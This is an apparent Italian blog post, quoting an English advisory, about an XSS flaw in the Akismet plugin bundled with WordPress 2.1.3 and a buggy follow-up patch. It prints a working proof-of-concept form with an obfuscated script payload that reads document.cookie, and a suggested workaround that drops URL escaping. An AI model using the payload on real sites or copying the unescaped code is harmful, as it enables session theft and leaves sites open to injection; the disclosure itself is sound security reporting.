Wordpress: Akismet XSS Security Flaw

Ed eccovi qua il bug del giorno, che mi tocca in quanto utilizzatore sfegatato della piattaforma wordpress e del suo inseparabile plugin anti spam (molto da migliorare IMHO!)

WordPress 2.1.3 Akismet Vulnerabilità - Exploit

Gli utenti WordPress che utilizzano il plugin Askimet per combattere lo spam nei commenti farebbero bene a sostituire il plugin "buggato" rilasciato di default con la versione 2.1.3 di WP con Askimet v2.0.2.

Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity

Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.

<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%22><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41) )</script>” type=”text”> <input id=”key” name=”key” size=”15? maxlength=”12? value=”1337?> <input name=”submit” value=”Update options »” type=”submit”> </form> </body> </html>

Payload will alert(document.cookie)

Just a PoC, I’m plainly too tired to write full code for making a post or stuff, thanks ;)

UPDATE: The Patch is buggy, Workaround for the wrong “Akismet Link” on your Wordpress Dashboard is avaible here.

Ma è buggata, come avete letto, anche la patch (succede anche nelle migliori famiglie)

Antonio Trigiani w3bL0g - Ingegneria Informatica Virale » Blog Archive » Bug e FIX nell'aggiornamento ad Akismet v2.0.2

Bene, se avete eseguito questo aggiornamento sappiate che è stato inserito un nuovo bug.Per essere più precisi la riga 529

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, clean_url(”$link?page=akismet-admin”), number_format($count) ).’</p>’;

Occorre sostituirla con il seguente workaround:

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, “$link?page=akismet-admin”, number_format($count) ).’</p>’;

Ora, qualcuno saprebbe dirmi in quali altri paradigmi di programmazione collaborativa succedono cose di questo genere?

Patch -> Fix -> Patch -> (e) Fix a poche ore l'uno dall'altro mentre Microsoft impiega settimane... volete altre dimostrazioni? Aspettate pochissimo...